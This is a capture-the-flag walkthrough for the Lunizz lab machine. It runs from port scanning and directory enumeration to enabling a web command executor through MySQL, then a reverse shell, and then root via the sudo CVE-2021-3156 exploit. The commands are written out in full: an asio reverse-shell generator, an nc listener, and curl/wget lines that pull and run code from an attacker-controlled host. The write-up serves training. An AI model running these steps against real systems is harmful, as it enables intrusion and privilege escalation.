Link to the ctf: Lunizz CTF

# Nmap 7.80 scan initiated Wed Feb 24 23:41:07 2021 as: nmap -sV -sC -p- -T4 -oN nmap.log
Nmap scan report for
Host is up (0.087s latency).
Not shown: 65530 closed ports
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
|   256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_  256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.32-0ubuntu0.18.04.1
|   Thread ID: 3
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, ConnectWithDatabase, FoundRows, IgnoreSigpipes, SupportsTransactions, LongPassword, ODBCClient, SwitchToSSLAfterHandshake, InteractiveClient, LongColumnFlag, SupportsCompression, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: `|lXPJ\x1CK5G";6\x10y
| Nq@Z
|_  Auth Plugin Name: mysql_native_password
4444/tcp open  krb524?
| fingerprint-strings: 
|   GetRequest: 
|     Can you decode this for me?
|     bGV0bWVpbg==
|     Wrong Password
|   NULL, SSLSessionReq: 
|     Can you decode this for me?
|_    bGV0bWVpbg==
5000/tcp open  upnp?
| fingerprint-strings: 
|   NULL: 
|     OpenSSH 5.1
|_    Unable to load config info from /usr/local/ssl/openssl.cnf
Port Service
22 SSH
3306 MySQL

Initial foothold

By using dirsearch with the wordlist SecLists/Discovery/Web-Content/raft-large-files.txt the webserver, we found a file called instructions.txt

Made By CTF_SCRIPTS_CAVE (not real)

Thanks for installing our ctf script

- Create a mysql user ([REDACTED]:[REDACTED])
- Change necessary lines of config.php file

Done you can start using ctf script

please do not use default creds (IT'S DANGEROUS) <<<<<<<<<---------------------------- READ THIS LINE PLEASE

In the webpage, we also found /whatever/index.php (again by using dirsearch and the wordlist SecLists/Discovery/Web-Content/raft-large-directories.txt) with a input field that could pontentially execute code, but it doesn’t work right now.

Also the Command Executer Mode :0 it kinda tells me that this function is disabled.


We can connect to MySQL by issuing the following command:


In the MySQL service, we have a database called runornot, containing a table called run with only one value: 0

I tried to change the value of the row.

UPDATE runcheck SET run=1;

Remote Code Execution

I went again to the /whatever/index.php and I saw that Command Executer Mode is set to 1. So tried again to use the input

And we got RCE.

I then used asio to get a reverse shell.

asio -H MY_IP -P 8080 -A -B

I then created a file called and put the one-liner from asio in it.

I opened a listener for the reverse shell.

rlwrap nc -vlp 8080

and then used python3 -m http.server to create a webserver.

NOTE: the command MUST run inside the same folder as

download the script on the target machine:

$(curl YOUR_IP:8000/ -o /tmp/)

and then execute it

bash /tmp/


Sudo is vulnerable to the CVE-2021-3156, this is the unintentional way that I found to get root.


I first cloned the repo on my machine where the python webserver is still running

Moving to the reverse shell: I created a folder inside /tmp called privesc, download the necessary files from the python webserver, issue make and then execute sudo-hax-me-a-sandwich

mkdir /tmp/privesc
cd /tmp/privesc
wget YOUR_IP:8000/CVE-2021-3156/Makefile
wget YOUR_IP:8000/CVE-2021-3156/hax.c
wget YOUR_IP:8000/CVE-2021-3156/lib.c

we can check which argument we can supply to it by issuing the following command:

cat /etc/*release

In this way, we see that the version of Ubuntu is 18.04.5 LTS (Bionic Beaver) so accordingly to sudo-hax-me-a-sandwich, we have to supply the argument 0

and we got root.